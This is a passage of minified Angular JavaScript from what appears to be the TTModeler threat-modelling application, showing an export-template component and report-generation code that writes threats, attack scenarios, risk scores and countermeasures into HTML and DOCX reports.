e.toString()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-export-template"]],viewQuery:function(e,i){if(1&e&&Mi(il,5),2&e){let n;Vt(n=Bt())&&(i.sort=n.first)}},inputs:{template:"template",canEdit:"canEdit"},decls:1,vars:1,consts:[["style","overflow: auto;",3,"disable",4,"ngIf"],[2,"overflow","auto"],["appearance","fill",1,"property-form-field"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill","style","margin-left: 10px;","class","property-form-field",4,"ngIf"],[3,"borderColor",4,"ngFor","ngForOf"],[2,"margin-top","10px"],["mat-raised-button","",3,"disabled","click"],["mat-raised-button","","color","primary",2,"margin-left","10px",3,"disabled","click"],["class","property-form-field","style","margin-top: 10px;",4,"ngIf"],[2,"margin-bottom","10px","max-height","300px","overflow","auto"],["mat-table","","matSort","",3,"dataSource",4,"ngIf"],[3,"value"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],[2,"width","142px",3,"ngModel","ngModelChange"],[2,"width","150px",3,"ngModel","ngModelChange","change"],["value",""],[3,"label",4,"ngFor","ngForOf"],[3,"label"],[1,"property-form-field",2,"margin-top","10px"],["matInput","",3,"keyup"],["mat-table","","matSort","",3,"dataSource"],[3,"matColumnDef",4,"ngFor","ngForOf"],["mat-header-row","",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",4,"matRowDef","matRowDefColumns"],[3,"matColumnDef"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["mat-header-cell","","mat-sort-header",""],["mat-cell",""],["mat-header-row",""],["mat-row",""]],template:function(e,i){1&e&&ne(0,myt,84,52,"div",0),2&e&&V("ngIf",i.template)},dependencies:[Zi,Ri,pm,_m,an,Td,Ta,Ea,oa,da,nn,un,Nr,yr,Xa,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,il,Mp,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();var x2=function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})};const hyt=["reportcontent"];function fyt(t,a){1&t&&(s(0,"\n              "),m(1,"mat-icon",8),s(2,"description"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n              ",re(4,1,"pages.reporting.Report"),"\n            "))}function pyt(t,a){if(1&t){const e=Ye();m(0,"button",12),s(1,"\n                  "),m(2,"mat-slide-toggle",13),he("ngModelChange",function(n){return be(e),Me(B(2).ShowTestCases=n)})("click",function(n){return n.stopPropagation()}),s(3),oe(4,"translate"),u(),s(5,"\n                "),u()}if(2&t){const e=B(2);C(2),V("ngModel",e.ShowTestCases),C(1),ct("\n                    ",re(4,2,"pages.reporting.showTestCases"),"\n                  ")}}function _yt(t,a){1&t&&it(0,"mat-progress-spinner",23),2&t&&V("diameter",25)}function gyt(t,a){1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t&&(C(1),ke(re(2,1,"pages.reporting.toBeGenerated")))}function Cyt(t,a){if(1&t){const e=Ye();s(0,"\n              "),m(1,"button",9),he("click",function(){return be(e),Me(B().GenerateReport())}),s(2),oe(3,"translate"),u(),s(4,"\n              "),m(5,"button",10),s(6,"\n                "),m(7,"mat-icon"),s(8,"settings"),u(),s(9,"\n              "),u(),s(10,"\n              "),m(11,"mat-menu",null,11),s(13,"\n                "),m(14,"button",12),s(15,"\n                  "),m(16,"mat-slide-toggle",13),he("ngModelChange",function(n){return be(e),Me(B().ShowCharts=n)})("click",function(n){return n.stopPropagation()}),s(17),oe(18,"translate"),u(),s(19,"\n                "),u(),s(20,"\n                "),m(21,"button",12),s(22,"\n                  "),m(23,"mat-slide-toggle",13),he("ngModelChange",function(n){return be(e),Me(B().DiagramShowGrid=n)})("click",function(n){return n.stopPropagation()}),s(24),oe(25,"translate"),u(),s(26,"\n                "),u(),s(27,"\n                "),m(28,"button",12),s(29,"\n                  "),m(30,"mat-slide-toggle",13),he("ngModelChange",function(n){return be(e),Me(B().ShowFirstTwoSteps=n)})("click",function(n){return n.stopPropagation()}),s(31),oe(32,"translate"),u(),s(33,"\n                "),u(),s(34,"\n                "),ne(35,pyt,6,4,"button",14),s(36,"\n              "),u(),s(37,"\n              "),ne(38,_yt,1,1,"mat-progress-spinner",15),s(39,"\n              "),m(40,"button",16),he("click",function(){return be(e),Me(B().SaveHTML())}),s(41),oe(42,"translate"),u(),s(43,"\n              "),m(44,"button",17),he("click",function(){return be(e),Me(B().SaveDOCX())}),s(45),oe(46,"translate"),u(),s(47,"\n\n              "),m(48,"div",18),s(49,"\n                "),m(50,"div",19,20),s(52,"\n                  "),m(53,"h1"),s(54,"TTModeler Report "),it(55,"img",21),u(),s(56,"\n                  "),m(57,"p"),s(58),oe(59,"translate"),u(),s(60,"\n                  "),m(61,"h2"),s(62),u(),s(63,"\n                  "),m(64,"p"),s(65),oe(66,"localDate"),oe(67,"translate"),u(),s(68,"\n                  "),ne(69,gyt,3,3,"ng-container",22),s(70,"\n                "),u(),s(71,"\n              "),u(),s(72,"\n            ")}if(2&t){const e=Ti(12),i=B();C(1),V("disabled",i.IsReportGenerating),C(1),ke(re(3,22,"pages.reporting.GenerateReport")),C(3),V("disabled",i.IsReportGenerating)("matMenuTriggerFor",e),C(11),V("ngModel",i.ShowCharts),C(1),ct("\n                    ",re(18,24,"pages.reporting.showCharts"),"\n                  "),C(6),V("ngModel",i.DiagramShowGrid),C(1),ct("\n                    ",re(25,26,"pages.reporting.showGrid"),"\n                  "),C(6),V("ngModel",i.ShowFirstTwoSteps),C(1),ct("\n                    ",re(32,28,"pages.reporting.showFristTwoSteps"),"\n                  "),C(4),V("ngIf",i.dataService.Project.HasTesting),C(3),V("ngIf",i.IsReportGenerating),C(2),V("disabled",!i.IsReportGenerated),C(1),ke(re(42,30,"pages.reporting.DownloadHTML")),C(3),V("disabled",!i.IsReportGenerated),C(1),ke(re(46,32,"pages.reporting.DownloadDOCX")),C(13),ke(re(59,34,"report.for")),C(4),ke(i.Project.GetProjectName()),C(3),J_("",re(66,36,i.GetDate()),", ",re(67,38,"properties.Version")," ",i.Project.UserVersion,""),C(4),V("ngIf",!i.IsReportGenerated)}}function yyt(t,a){1&t&&(s(0,"\n              "),m(1,"mat-icon",8),s(2,"table_chart"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n              ",re(4,1,"pages.reporting.Export"),"\n            "))}function byt(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",33),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedExportTemplate=r)}),s(1,"\n                      "),m(2,"mat-icon",34),s(3,"arrow_right"),u(),s(4,"\n                      "),m(5,"div",35),s(6),u(),s(7,"\n                      "),m(8,"button",36),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteTemplate(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"delete"),u()(),s(12,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedExportTemplate===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedExportTemplate===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),at("matTooltip",re(9,7,"general.Delete"))}}function Myt(t,a){1&t&&it(0,"app-export-template",37),2&t&&V("template",B(2).selectedExportTemplate)}function vyt(t,a){if(1&t){const e=Ye();s(0,"\n              "),m(1,"div",24),s(2,"\n                "),m(3,"div",25),s(4,"\n                  "),m(5,"mat-list",26),s(6,"\n                    "),m(7,"div",27),s(8),oe(9,"translate"),m(10,"button",28),he("click",function(){return be(e),Me(B().AddTemplate())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()(),s(14,"\n                    "),u(),s(15,"\n                    "),ne(16,byt,13,9,"mat-list-item",29),s(17,"\n                  "),u(),s(18,"\n                  "),m(19,"button",30),he("click",function(){return be(e),Me(B().SaveExcel())}),s(20),oe(21,"translate"),u(),s(22,"\n                "),u(),s(23,"\n                "),m(24,"div",31),s(25,"\n                  "),m(26,"div",4),s(27,"\n                    "),ne(28,Myt,1,1,"app-export-template",32),s(29,"\n                  "),u(),s(30,"\n                "),u(),s(31,"\n              "),u(),s(32,"\n            ")}if(2&t){const e=B();C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),ct("",re(9,10,"pages.reporting.Templates")," \n                      "),C(2),at("matTooltip",re(11,12,"general.Add")),C(6),V("ngForOf",e.exportTemplates),C(3),V("disabled",0==e.exportTemplates.length),C(1),ke(re(21,14,"pages.reporting.exporttemplate.DownloadExcel")),C(8),V("ngIf",e.selectedExportTemplate)}}const Ayt=[{path:"reporting",component:(()=>{class t{constructor(e,i,n,r,c,d,T,k,q){this.theme=e,this.dataService=i,this.ttmService=n,this.translate=r,this.dialog=c,this.router=d,this.http=T,this.locStorage=k,this.viewContainerRef=q,this.docWidth=793,this.htmlBuffer=[],this.docxBuffer=[],this.IsReportGenerated=!1,this.IsReportGenerating=!1,this.selectedExportTemplate=null,this.dataService.Project||this.router.navigate(["/home"],{queryParams:{origin:"reporting"}}),null==this.locStorage.Get(si.PAGE_REPORTING_SHOW_FIRST_STEPS)&&(this.ShowFirstTwoSteps=!0),null==this.locStorage.Get(si.PAGE_REPORTING_SHOW_TEST_CASES)&&(this.ShowTestCases=!0)}get ShowCharts(){return"true"==this.locStorage.Get(si.PAGE_REPORTING_SHOW_CHARTS)}set ShowCharts(e){this.locStorage.Set(si.PAGE_REPORTING_SHOW_CHARTS,String(e))}get DiagramShowGrid(){return"true"==this.locStorage.Get(si.PAGE_REPORTING_DIAGRAM_SHOW_GRID)}set DiagramShowGrid(e){this.locStorage.Set(si.PAGE_REPORTING_DIAGRAM_SHOW_GRID,String(e))}get ShowFirstTwoSteps(){return"true"==this.locStorage.Get(si.PAGE_REPORTING_SHOW_FIRST_STEPS)}set ShowFirstTwoSteps(e){this.locStorage.Set(si.PAGE_REPORTING_SHOW_FIRST_STEPS,String(e))}get ShowTestCases(){return"true"==this.locStorage.Get(si.PAGE_REPORTING_SHOW_TEST_CASES)}set ShowTestCases(e){this.locStorage.Set(si.PAGE_REPORTING_SHOW_TEST_CASES,String(e))}get exportTemplates(){return this.dataService.Project.GetExportTemplates()}ngOnInit(){this.Project=this.dataService.Project}GenerateReport(){return x2(this,void 0,void 0,function*(){this.IsReportGenerating=!0,yield this.initializeReportHTML(),this.initializeReportDOCX().then(()=>x2(this,void 0,void 0,function*(){var e,i,n,r;this.Project.Participants.length>0&&(this.createParagraph(this.translate.instant("report.by")),this.createUL(this.Project.Participants.map(Ne=>{var et;return Ne.Name+((null===(et=Ne.Email)||void 0===et?void 0:et.length)>0?" ("+Ne.Email+")":"")}))),this.createHeading(this.translate.instant("report.ExecutiveSummary")),this.Project.GetMobileApps().length>0?this.createParagraph(Gi.Format(this.translate.instant("report.SUCinContext"),this.Project.GetDevices().map(Ne=>Ne.Name).join(", "),this.Project.GetMobileApps().map(Ne=>Ne.Name).join(", "))):this.createParagraph(Gi.Format(this.translate.instant("report.SUC"),this.Project.GetDevices().map(Ne=>Ne.Name).join(", "),this.Project.GetMobileApps().map(Ne=>Ne.Name).join(", "))),this.createParagraph(Gi.Format(this.translate.instant("report.UseCaseUC"),this.Project.GetDFDiagrams().map(Ne=>Ne.Name).join(", "))),this.createParagraph(""),this.Project.Image&&(yield(et=>x2(this,void 0,void 0,function*(){const ut=new Image;return ut.src=et,yield ut.decode(),ut}))(this.Project.Image).then(et=>{this.createImage(this.Project.Image,et.naturalWidth,et.naturalHeight),this.createParagraph("")})),this.createParagraph(this.translate.instant("report.IdentifiedSystemThreats")+": "),this.createUL(this.Project.GetSystemThreats().map(Ne=>Ne.GetLongName())),this.createParagraph(""),this.createParagraph(Gi.Format(this.translate.instant("report.scenariosAndMeasures"),this.Project.GetAttackScenariosApplicable().length.toString(),this.Project.GetCountermeasuresApplicable().length.toString())),this.createParagraph(""),this.createParagraph(this.translate.instant("report.riskAssessment")),this.createLink(this.translate.instant("report.FurtherInfoCVSS"),"https://www.first.org/cvss/specification-document"),this.createRiskTable(),this.createParagraph(""),this.createParagraph(this.translate.instant("report.riskStrategy")),this.createParagraph("");let c=[],d=[];this.Project.GetMyTagCharts().filter(Ne=>Ne.MyTags.length>0).forEach(Ne=>{c.push(yf.CreateTagDiagram),d.push(Ne)}),c.push(yf.CreateSeveritySummaryDiagram,yf.CreateRiskSummaryDiagram,yf.CreateSeverityPerTypeDiagram,yf.CreateSeverityPerLifecycleDiagram,yf.CreateSeverityPerImpactCatDiagram,yf.CreateCountermeasureSummaryDiagram),d.push(null,null,null,null,null,null);for(let Ne=0;Ne<c.length;Ne++){const et=c[Ne](this.Project,this.translate,!1,600,400,d[Ne]);if(this.ShowCharts){let ut=this.viewContainerRef.createComponent(SZ);ut.instance.elRef.nativeElement.style.color="black",ut.instance.diagram=et,yield new Promise(yt=>setTimeout(()=>{let It=St=>{St.classList.remove("chartDark"),Array.from(St.children).forEach(Nt=>It(Nt))};It(ut.instance.elRef.nativeElement),yt()},10)),yield this.getComponentImage(ut,600,[0,0,0,0]).then(yt=>{this.createImage(yt[0],yt[1],yt[2])})}else if((null===(e=et.results)||void 0===e?void 0:e.length)>0){let ut=[];et.results.forEach(Ze=>{ut.push([Ze.name,...Ze.series.map(yt=>yt.value)])}),this.createTable([et.xAxisLabel,...et.results[0].series.map(Ze=>Ze.name)],ut),this.createParagraph("")}}if(this.Project.GetSystemThreats().length>0){this.createSubHeading(this.translate.instant("report.RiskOfSystemThreats")),this.createParagraph(this.translate.instant("report.systemThreatsExplanation")),this.createParagraph("");const Ne=this.Project.GetAttackScenariosApplicable();this.Project.GetSystemThreats().forEach(et=>{const ut=Ne.filter(Ze=>Ze.SystemThreats.includes(et));if(ut.sort((Ze,yt)=>Ze.Risk>=0&&yt.Risk>=0?Number(Ze.Risk)>Number(yt.Risk)?-1:Number(Ze.Risk)==Number(yt.Risk)?0:1:Ze.Risk?-1:1),ut.length>0){const Ze=ut.map(Nt=>Nt.Risk).filter(Nt=>Nt==Nt&&null!=Nt),yt=Math.max(...Ze.map(Nt=>Number(Nt))),It=this.translate.instant(yt>0?vn.ToString(yt):"report.UnknownRisk");this.createParagraph(et.GetLongName()+" - "+this.translate.instant("properties.Risk")+": "+It);const St=[];ut.forEach(Nt=>{const oi=[];Nt.ScoreCVSS&&Nt.ScoreCVSS.Score>0&&oi.push(this.translate.instant("report.CvssScore")+": "+Nt.ScoreCVSS.Score.toFixed(1)),Nt.ScoreOwaspRR&&Nt.ScoreOwaspRR.Score>0&&oi.push(this.translate.instant("report.OwaspRRScore")+": "+Nt.ScoreOwaspRR.Score.toFixed(1)),Nt.Likelihood&&oi.push(this.translate.instant("general.Likelihood")+": "+this.translate.instant(An.ToString(Nt.Likelihood))),Nt.Risk&&oi.push(this.translate.instant("properties.Risk")+": "+this.translate.instant(vn.ToString(Nt.Risk))),St.push(Nt.GetLongName()+": "+oi.join(", "))}),this.createUL(St)}else this.createParagraph(et.GetLongName()+" - "+this.translate.instant("report.UnknownRisk"));this.createParagraph("")})}const T=Ne=>{const et=this.Project.GetAttackScenariosApplicable().filter(Ze=>Ze.ViewID==Ne);et.sort((Ze,yt)=>{var It,St;const Nt=(Ai,vi)=>Ai>=0&&vi>=0?Number(Ai)>Number(vi)?-1:Number(Ai)<Number(vi)?1:0:Ai?-1:1;let oi=Nt(Ze.Risk,yt.Risk);return 0==oi&&(oi=Nt(Ze.Severity,yt.Severity)),0==oi&&(oi=Nt(Ze.ThreatState,yt.ThreatState)),0==oi&&(null===(It=Ze.ScoreCVSS)||void 0===It?void 0:It.Score)&&(null===(St=yt.ScoreCVSS)||void 0===St?void 0:St.Score)&&(oi=Nt(Ze.ScoreCVSS,yt.ScoreCVSS)),0==oi&&(oi=Nt(yt.Number,Ze.Number)),oi}),et.length>0&&(this.createParagraph(""),this.createSubSubSubHeading(this.translate.instant("general.AttackScenarios")),et.forEach(Ze=>{var yt,It,St,Nt,oi,Ai,vi,xi,Za,wa,en,Vo,Di;this.createBoldParagraph(Ze.GetLongName()),this.createParagraph(this.translate.instant("properties.Status")+": "+this.translate.instant(ku.ToString(Ze.ThreatState))),(null===(yt=Ze.Description)||void 0===yt?void 0:yt.length)>0&&this.createParagraph(this.translate.instant("properties.Description")+": "+Ze.Description),(null===(It=Ze.SystemThreats)||void 0===It?void 0:It.length)>0&&this.createParagraph(this.translate.instant("general.SystemThreats")+": "+Ze.SystemThreats.map(Oi=>Oi.Name).join(", ")),this.Project.Settings.ThreatActorToAttackScenario&&(null===(St=Ze.ThreatSources)||void 0===St?void 0:St.length)>0&&this.createParagraph(this.translate.instant("general.ThreatSources")+": "+Ze.ThreatSources.map(Oi=>Oi.Name).join(", ")),!(null===(oi=null===(Nt=Ze.AttackVector)||void 0===Nt?void 0:Nt.AttackTechnique)||void 0===oi)&&oi.CAPECID&&this.createLink(this.translate.instant("properties.CAPECID")+": "+Ze.AttackVector.AttackTechnique.CAPECID.toString(),wZ.GetURL(Ze.AttackVector.AttackTechnique.CAPECID)),!(null===(vi=null===(Ai=Ze.AttackVector)||void 0===Ai?void 0:Ai.Weakness)||void 0===vi)&&vi.CWEID&&this.createLink(this.translate.instant("properties.CWEID")+": "+Ze.AttackVector.Weakness.CWEID.toString(),N5.GetURL(Ze.AttackVector.Weakness.CWEID)),Ze.GetAffectedAssetObjects().length>0&&this.createParagraph(this.translate.instant("report.AffectedAssets")+": "+Ze.GetAffectedAssetObjects().map(Oi=>Oi.GetLongName()).join(", ")),Ze.ScoreCVSS&&Ze.ScoreCVSS.Score&&(this.createParagraph(this.translate.instant("report.CvssScore")+": "+Ze.ScoreCVSS.Score.toFixed(1)),this.createLink(this.translate.instant("report.CvssVector")+": "+Wm.GetVector(Ze.ScoreCVSS),Wm.GetURL(Ze.ScoreCVSS))),Ze.ScoreOwaspRR&&Ze.ScoreOwaspRR.Score&&(this.createParagraph(this.translate.instant("report.OwaspRRScore")+": "+Ze.ScoreOwaspRR.Score.toFixed(1)),this.createLink(this.translate.instant("report.OwaspRRVector")+": "+IT.GetVector(Ze.ScoreOwaspRR),IT.GetURL(Ze.ScoreOwaspRR))),Ze.Severity&&this.createParagraph(this.translate.instant("properties.Severity")+": "+this.translate.instant(vn.ToString(Ze.Severity))),(null===(xi=Ze.SeverityReason)||void 0===xi?void 0:xi.length)>0&&this.createParagraph(this.translate.instant("properties.SeverityReason")+": "+Ze.SeverityReason),Ze.Likelihood&&this.createParagraph(this.translate.instant("general.Likelihood")+": "+this.translate.instant(An.ToString(Ze.Likelihood))),(null===(Za=Ze.LikelihoodReason)||void 0===Za?void 0:Za.length)>0&&this.createParagraph(this.translate.instant("properties.LikelihoodReason")+": "+Ze.LikelihoodReason),Ze.Risk&&this.createParagraph(this.translate.instant("properties.Risk")+": "+this.translate.instant(vn.ToString(Ze.Risk))),(null===(wa=Ze.RiskReason)||void 0===wa?void 0:wa.length)>0&&this.createParagraph(this.translate.instant("properties.RiskReason")+": "+Ze.RiskReason),Ze.RiskStrategy&&this.createParagraph(this.translate.instant("properties.RiskStrategy")+": "+this.translate.instant(fT.ToString(Ze.RiskStrategy))),(null===(en=Ze.RiskStrategyReason)||void 0===en?void 0:en.length)>0&&this.createParagraph(this.translate.instant("properties.RiskStrategyReason")+": "+Ze.RiskStrategyReason),(null===(Vo=Ze.GetCountermeasures())||void 0===Vo?void 0:Vo.length)>0&&this.createParagraph(this.translate.instant("general.Countermeasures")+": "+Ze.GetCountermeasures().map(Oi=>Oi.GetLongName()).join(", ")),(null===(Di=Ze.LinkedScenarios)||void 0===Di?void 0:Di.length)>0&&this.createParagraph(this.translate.instant("report.SeeAlso")+": "+Ze.LinkedScenarios.map(Oi=>"AS"+Oi.Number).join(", "));const Pi=this.Project.GetTestCases().filter(Oi=>Oi.LinkedScenarios.includes(Ze));Pi.length>0&&this.createParagraph(this.translate.instant("report.SeeAlso")+": "+Pi.map(Oi=>"TC"+Oi.Number).join(", ")),Ze.MyTags.length>0&&this.createParagraph(this.translate.instant("general.Tags")+": "+Ze.MyTags.map(Oi=>Oi.Name).join(", ")),this.createParagraph("")}));const ut=this.Project.GetCountermeasuresApplicable().filter(Ze=>Ze.ViewID==Ne);ut.length>0&&(this.createParagraph(""),this.createSubSubSubHeading(this.translate.instant("general.Countermeasures")),ut.forEach(Ze=>{var yt;this.createBoldParagraph(Ze.GetLongName()),Ze.MitigationState&&this.createParagraph(this.translate.instant("properties.Status")+": "+this.translate.instant(al.ToString(Ze.MitigationState))),(null===(yt=Ze.Description)||void 0===yt?void 0:yt.length)>0&&this.createParagraph(this.translate.instant("properties.Description")+": "+Ze.Description),Ze.MitigationProcess&&this.createParagraph(this.translate.instant("general.MitigationProcess")+": "+Ze.MitigationProcess.GetLongName()),this.createParagraph(this.translate.instant("pages.modeling.countermeasure.mitigatedThreats")+": "+Ze.AttackScenarios.map(St=>St.GetLongName()).join(", "));const It=this.Project.GetTestCases().filter(St=>St.LinkedMeasures.includes(Ze));It.length>0&&this.createParagraph(this.translate.instant("report.SeeAlso")+": "+It.map(St=>"TC"+St.Number).join(", ")),Ze.MyTags.length>0&&this.createParagraph(this.translate.instant("general.Tags")+": "+Ze.MyTags.map(St=>St.Name).join(", ")),this.createParagraph("")}))};this.createParagraph(""),this.createHeading(this.translate.instant("report.DetailedResults")),this.ShowFirstTwoSteps&&(this.createSubHeading(this.ttmService.Stages[0].steps[0].name.replace("[Optional]","")),this.Project.GetCharScope().StepProperties.forEach(Ne=>{this.Project.GetCharScope()[Ne].length>0&&(this.createSubSubHeading(this.translate.instant("pages.modeling.charscope."+Ne)),this.createUL(this.Project.GetCharScope()[Ne]))}),this.createSubHeading(this.ttmService.Stages[0].steps[1].name.replace("[Optional]","")),this.Project.GetObjImpact().StepProperties.forEach(Ne=>{this.Project.GetObjImpact()[Ne].length>0&&(this.createSubSubHeading(this.translate.instant("pages.modeling.objimpact."+Ne)),this.createUL(this.Project.GetObjImpact()[Ne]))})),this.createSubHeading(this.ttmService.Stages[0].steps[2].name.replace("[Optional]","")),this.createSubSubHeading(this.translate.instant("report.SysInterationDia")),this.createDiagram(this.Project.GetSysContext().ContextDiagram),T(this.Project.GetSysContext().ContextDiagram.ID),this.createSubSubHeading(this.translate.instant("report.UseCaseDia")),this.createDiagram(this.Project.GetSysContext().UseCaseDiagram),T(this.Project.GetSysContext().UseCaseDiagram.ID),this.createSubHeading(this.ttmService.Stages[0].steps[3].name),this.createParagraph(this.translate.instant("report.identifiedAssets"));let k=[["Assets",this.Project.GetProjectAssetGroup()]];this.Project.GetDevices().forEach(Ne=>k.push([Ne.Name,Ne.AssetGroup])),this.Project.GetMobileApps().forEach(Ne=>k.push([Ne.Name,Ne.AssetGroup])),k=k.filter(Ne=>null!=Ne[1]);const q=k.filter(Ne=>Ne[1].IsActive).length,Y=this.locStorage.Get(si.PAGE_MODELING_ASSETS_TAB_INDEX);this.locStorage.Set(si.PAGE_MODELING_ASSETS_TAB_INDEX,"0");for(let Ne=0;Ne<k.length;Ne++)if(k[Ne][1].IsActive){q>1&&this.createSubSubHeading(k[Ne][0]);const et=this.viewContainerRef.createComponent(IZ);et.instance.assetGroup=k[Ne][1],et.instance.hideButtons=!0,et.instance.elRef.nativeElement.style.color="black",yield new Promise(yt=>setTimeout(()=>{let It=St=>{St.classList.contains("assetColumn")&&(St.style.backgroundColor="#e7e5e5"),"path"==St.tagName&&St.setAttribute("fill","#e7e5e5"),Array.from(St.children).forEach(Nt=>It(Nt))};It(et.instance.elRef.nativeElement),yt()},10)),yield this.getComponentImage(et,this.docWidth,[0,25,0,0]).then(yt=>{this.createImage(yt[0],yt[1],yt[2])});const Ze=[...k[Ne][1].GetGroupsFlat().filter(yt=>yt.IsNewAsset),...k[Ne][1].GetMyDataFlat().filter(yt=>yt.IsNewAsset)];Ze.sort((yt,It)=>Number(yt.Number)>Number(It.Number)?1:yt.Number==It.Name?0:-1),this.createUL(Ze.map(yt=>{var It;let St=yt.GetLongName();return yt instanceof Pu&&(St+=" ("+this.translate.instant("properties.Sensitivity")+": "+this.translate.instant(An.ToString(yt.Sensitivity))+")"),(null===(It=yt.ImpactCats)||void 0===It?void 0:It.length)>0&&(St+=" ("+this.translate.instant("properties.ImpactCategories")+": "+yt.ImpactCats.map(Nt=>this.translate.instant(Vs.ToString(Nt))).join(", ")+")"),St}))}this.locStorage.Set(si.PAGE_MODELING_ASSETS_TAB_INDEX,Y),this.createSubHeading(this.translate.instant("general.ThreatSources")),this.createParagraph(this.translate.instant("report.IdentifiedThreatSources")+":"),this.Project.GetThreatSources().Sources.forEach(Ne=>{this.createBoldParagraph(Ne.GetLongName()),Ne.Motive.length>0&&(this.createParagraph(this.translate.instant("properties.Motive")+":"),this.createUL(Ne.Motive)),Ne.Capabilities.length>0&&(this.createParagraph(this.translate.instant("properties.Capabilities")+":"),this.createUL(Ne.Capabilities)),this.createParagraph(this.translate.instant("general.Likelihood")+": "+this.translate.instant(An.ToString(Ne.Likelihood))),this.createParagraph("")}),this.createSubHeading(this.translate.instant("general.SystemThreats")),this.Project.GetSystemThreats().forEach(Ne=>{var et,ut;this.createBoldParagraph(Ne.GetLongName()),Ne.ThreatCategory&&this.createParagraph(this.translate.instant("general.ThreatCategory")+": "+Ne.ThreatCategory.Name),(null===(et=Ne.Description)||void 0===et?void 0:et.length)>0&&this.createParagraph(this.translate.instant("properties.consequencesImpact")+": "+Ne.Description),(null===(ut=Ne.AffectedAssetObjects)||void 0===ut?void 0:ut.length)>0&&this.createParagraph(this.translate.instant("report.AffectedAssets")+": "+Ne.AffectedAssetObjects.map(Ze=>Ze.Name).join(", ")),this.createParagraph(this.translate.instant("properties.Impact")+": "+this.translate.instant(An.ToString(Ne.Impact))+" ("+Ne.ImpactCats.map(Ze=>this.translate.instant(Vs.ToString(Ze))).join(", ")+")"),this.createParagraph("")});const te=this.Project.GetDevices().length;te>0&&this.createSubHeading(this.ttmService.Stages[1].steps[1].name),this.Project.GetDevices().forEach(Ne=>{te>1&&this.createSubSubHeading(Ne.Name),this.createDiagram(Ne.HardwareDiagram),T(Ne.HardwareDiagram.ID)});const pe=Ne=>{Ne.classList.contains("component-dark")&&(Ne.style.borderColor="black",Ne.classList.remove("component-dark")),Ne.classList.contains("component-third-party")&&(Ne.style.backgroundColor="#e6e6e6"),Array.from(Ne.children).forEach(et=>pe(et))},Re=[...this.Project.GetDevices(),...this.Project.GetMobileApps()];let Fe=Re.map(Ne=>Ne.SoftwareStack).filter(Ne=>null!=Ne&&Ne.GetChildrenFlat().length>0).length;Fe>0&&this.createSubHeading(this.ttmService.Stages[1].steps[2].name);for(let Ne=0;Ne<Re.length;Ne++)if((null===(i=Re[Ne].SoftwareStack)||void 0===i?void 0:i.GetChildrenFlat().length)>0){Fe>1&&this.createSubSubHeading(Re[Ne].Name);const et=this.viewContainerRef.createComponent(gT);et.instance.stack=Re[Ne].SoftwareStack,et.instance.elRef.nativeElement.style.color="black",yield new Promise(Ze=>setTimeout(()=>{pe(et.instance.elRef.nativeElement),Ze()},10)),yield this.getComponentImage(et,this.docWidth,[20,50,0,25]).then(Ze=>{this.createImage(Ze[0],Ze[1],Ze[2]),T(Re[Ne].SoftwareStack.ID)})}this.createSubHeading(this.ttmService.Stages[1].steps[3].name),this.Project.GetHWDFDiagrams().filter(Ne=>Ne.DiagramType==xn.DataFlow).forEach(Ne=>{this.createSubSubHeading(Ne.Name),this.createDiagram(Ne),T(Ne.ID)}),Fe=Re.map(Ne=>Ne.ProcessStack).filter(Ne=>null!=Ne&&Ne.GetChildrenFlat().length>0).length,Fe>0&&this.createSubHeading(this.ttmService.Stages[1].steps[4].name);for(let Ne=0;Ne<Re.length;Ne++)if((null===(n=Re[Ne].ProcessStack)||void 0===n?void 0:n.GetChildrenFlat().length)>0){Fe>1&&this.createSubSubHeading(Re[Ne].Name);const et=this.viewContainerRef.createComponent(gT);et.instance.stack=Re[Ne].ProcessStack,et.instance.elRef.nativeElement.style.color="black",yield new Promise(Ze=>setTimeout(()=>{pe(et.instance.elRef.nativeElement),Ze()},10)),yield this.getComponentImage(et,this.docWidth,[20,50,0,25]).then(Ze=>{this.createImage(Ze[0],Ze[1],Ze[2]),T(Re[Ne].ProcessStack.ID)})}if(this.Project.GetMitigationProcesses().length>0&&(this.createSubHeading(this.translate.instant("general.MitigationProcesses")),this.createParagraph(this.translate.instant("report.mitigationProcessExplanation")),this.createParagraph(""),this.Project.GetMitigationProcesses().forEach(Ne=>{var et,ut,Ze;this.createBoldParagraph(Ne.GetLongName()),Ne.MitigationProcessState&&this.createParagraph(this.translate.instant("properties.Status")+": "+this.translate.instant(C2.ToString(Ne.MitigationProcessState))+" ("+this.translate.instant("general.Progress")+": "+Ne.Progress.toFixed(0)+"%)"),(null===(et=Ne.Description)||void 0===et?void 0:et.length)>0&&this.createParagraph(this.translate.instant("properties.Description")+": "+Ne.Description),(null===(ut=Ne.Tasks)||void 0===ut?void 